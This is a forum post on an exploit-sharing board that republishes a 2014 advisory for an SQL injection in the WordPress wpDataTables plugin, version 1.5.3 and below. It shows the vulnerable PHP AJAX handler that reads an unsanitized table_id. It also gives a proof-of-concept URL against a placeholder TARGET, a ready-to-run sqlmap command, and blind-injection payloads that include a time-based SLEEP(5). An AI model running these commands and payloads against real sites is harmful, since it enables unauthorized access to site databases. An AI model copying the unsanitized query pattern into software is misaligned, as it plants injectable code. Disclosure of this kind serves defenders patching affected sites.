Jump to content
Aerosol

WordPress wpDataTables 1.5.3 SQL Injection

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

?######################

# Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability

# Exploit Author : Claudio Viviani 

# Software Link : http://wpdatatables.com (Premium)

# Date : 2014-11-22

# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0

######################


# Description

Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability

"table_id" variable is not sanitized.

File: wpdatatables.php
------------------------
    // AJAX-handlers
    add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
    add_action( 'wp_ajax_nopriv_get_wdtable', 'wdt_get_ajax_data' );

  /**
   * Handler which returns the AJAX response
   */
   function wdt_get_ajax_data(){
     $id = $_GET['table_id']; <------------------- Not Sanitized!
       $table_data = wdt_get_table_by_id( $id );
       $column_data = wdt_get_columns_by_table_id( $id );
       $column_headers = array();
       $column_types = array();
       $column_filtertypes = array();
       $column_inputtypes = array();
       foreach($column_data as $column){
           $column_order[(int)$column->pos] = $column->orig_header;
           if($column->display_header){
             $column_headers[$column->orig_header] = $column->display_header;
           }
           if($column->column_type != 'autodetect'){
             $column_types[$column->orig_header] = $column->column_type;
           }else{
             $column_types[$column->orig_header] = 'string';
           }  
           $column_filtertypes[$column->orig_header] = $column->filter_type;
           $column_inputtypes[$column->orig_header] = $column->input_type;
       }
------------------------

(The vulnerable variable is located in others php files)


######################

# PoC

http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1 [Sqli]

# Sqlmap

sqlmap -u "http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1" -p table_id --dbms mysql

---
Parameter: table_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=get_wdtable&table_id=1 AND 9029=9029

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=get_wdtable&table_id=1 AND SLEEP(5)

---


#####################

Discovered By : Claudio Viviani
                http://www.homelab.it

                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...